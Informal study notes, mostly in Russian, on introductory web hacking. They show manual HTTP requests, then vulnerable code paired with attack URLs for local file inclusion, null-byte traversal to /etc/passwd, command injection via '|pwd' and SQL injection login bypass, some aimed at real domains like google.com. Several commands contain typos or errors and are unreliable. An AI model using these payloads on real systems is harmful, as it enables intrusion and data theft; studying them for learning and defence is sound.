host google.com

telnet google.com 80
Get / HTTp/1.1
Host: google.com


nc google.com 80
GET / HTTP/1.1
Host: google.com

bash
echo "GET /$1 HTTP/1.1"
echo "Host: $2"
echo ""

//$1, 2 переменный вводить в строке


Подключаемся по SSl
openssl s_client -connect e.mail.ru:443
.
.
.
GET /robots.txt HTTP/1.1
Host: e.mail.ru

Инструменты
wget -O http://traget.com
curl http://target.com

wget -O- --header"headername:value" http://target.com
curl -H "headername:value" http://target.com

Версия кода
svn checkout http://svn.target.org/egro/trunk/alias/default

ls egro
ls egro/.svn/ - тут может быть полезная информация.

***********************************************************
LFI

Если можно внедрить в код
рекурентный вызов
...
$name=GET('fn');
print(loadfile($name));
...
Запустить 
google.com/runpage.php?page=../runpage.php

************************************************************
null-byte

...
$name=GET('fn')+'.txt'
loadfile($name);
...

google.com/getpage.php?page=../../../../../../etc/passwd%00

***********************************************************

comand injection
...
$param = GET('host')
system('ping -c 1' +$param);
...

google.com/hosttool.php?host=8.8.8.8:id
or
google.com/hosttool.php?host=8.8.8.8|pwd

***************************************************************

SQL Injection

http://target.com/login?name=alex' -- .&pass=any

запрос будет следующий
SELECT id FROM users WHERE user='alex' -- .' and password ='1234'

после .' and password ='1234'запрос будет обросан и мы должны получить id успешную авторизацию, но как правило
такие пользователи ыз маленькой привилегией.

 








